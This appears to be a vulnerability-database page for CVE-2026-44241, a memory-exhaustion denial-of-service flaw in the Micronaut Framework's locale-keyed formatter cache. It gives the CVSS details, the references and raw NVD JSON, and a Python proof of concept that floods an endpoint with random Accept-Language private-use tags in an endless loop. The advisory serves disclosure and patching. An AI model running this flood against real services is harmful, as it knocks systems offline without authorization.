CVE-2026-44241

Description

Micronaut Framework is a JVM-based full stack Java framework designed for building modular, easily testable JVM applications. From 4.3.0 to before 4.10.22, TimeConverterRegistrar caches DateTimeFormatter instances in an unbounded ConcurrentHashMap<String, DateTimeFormatter> whose key is derived from the @Format annotation pattern concatenated with the locale from the HTTP Accept-Language header. Because Locale.forLanguageTag() accepts arbitrary BCP 47 private-use extensions (en-x-a001, en-x-a002, …), an unauthenticated attacker can generate an unlimited number of unique cache keys by sending requests with novel locale tags, growing the cache until heap memory is exhausted and the JVM crashes. This vulnerability is fixed in 4.10.22.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Micronaut Framework >= 4.3.0, < 4.10.22

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import random
import string

def generate_random_locale():
    # Generate a random private-use extension tag (e.g., en-x-{random})
    random_suffix = ''.join(random.choices(string.ascii_lowercase + string.digits, k=5))
    return f"en-x-{random_suffix}"

def exploit(url):
    headers = {
        # Target the Accept-Language header to trigger the cache key generation
        'Accept-Language': generate_random_locale(),
        'User-Agent': 'CVE-2026-44241-PoC'
    }
    
    try:
        print(f"Sending request with locale: {headers['Accept-Language']}")
        response = requests.get(url, headers=headers, timeout=5)
        print(f"Response status: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")

if __name__ == "__main__":
    target_url = "http://localhost:8080/api/date" 
    print("Starting DoS attack via unbounded cache...")
    while True:
        exploit(target_url)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44241
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44241
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44241/
[4] VulDB https://vuldb.com/cve/CVE-2026-44241
[5] https://github.com/micronaut-projects/micronaut-core/releases/tag/v4.10.22
[6] https://github.com/micronaut-projects/micronaut-core/security/advisories/GHSA-8hjv-92q9-g4xj

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44241", "sourceIdentifier": "[email protected]", "published": "2026-05-12T22:16:35.473", "lastModified": "2026-05-12T22:16:35.473", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Micronaut Framework is a JVM-based full stack Java framework designed for building modular, easily testable JVM applications. From 4.3.0 to before 4.10.22, TimeConverterRegistrar caches DateTimeFormatter instances in an unbounded ConcurrentHashMap<String, DateTimeFormatter> whose key is derived from the @Format annotation pattern concatenated with the locale from the HTTP Accept-Language header. Because Locale.forLanguageTag() accepts arbitrary BCP 47 private-use extensions (en-x-a001, en-x-a002, …), an unauthenticated attacker can generate an unlimited number of unique cache keys by sending requests with novel locale tags, growing the cache until heap memory is exhausted and the JVM crashes. This vulnerability is fixed in 4.10.22."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://github.com/micronaut-projects/micronaut-core/releases/tag/v4.10.22", "source": "[email protected]"}, {"url": "https://github.com/micronaut-projects/micronaut-core/security/advisories/GHSA-8hjv-92q9-g4xj", "source": "[email protected]"}]}}